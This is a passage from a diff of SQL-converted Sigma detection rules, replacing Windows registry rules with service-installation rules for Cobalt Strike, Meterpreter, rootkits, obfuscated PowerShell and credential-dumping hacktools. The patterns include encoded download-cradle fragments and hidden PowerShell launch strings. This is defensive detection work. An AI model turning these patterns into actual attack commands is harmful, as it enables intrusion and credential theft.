"win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. 
For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + 
"description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.privilege_escalation", 
+ "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", 
"tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious 
double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 
'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": 
"registry_event_malware_qakbot_registry.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": 
"7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": 
"test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + 
"level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE 
'\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1546.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unlikely" ], - "level": "medium", + "level": 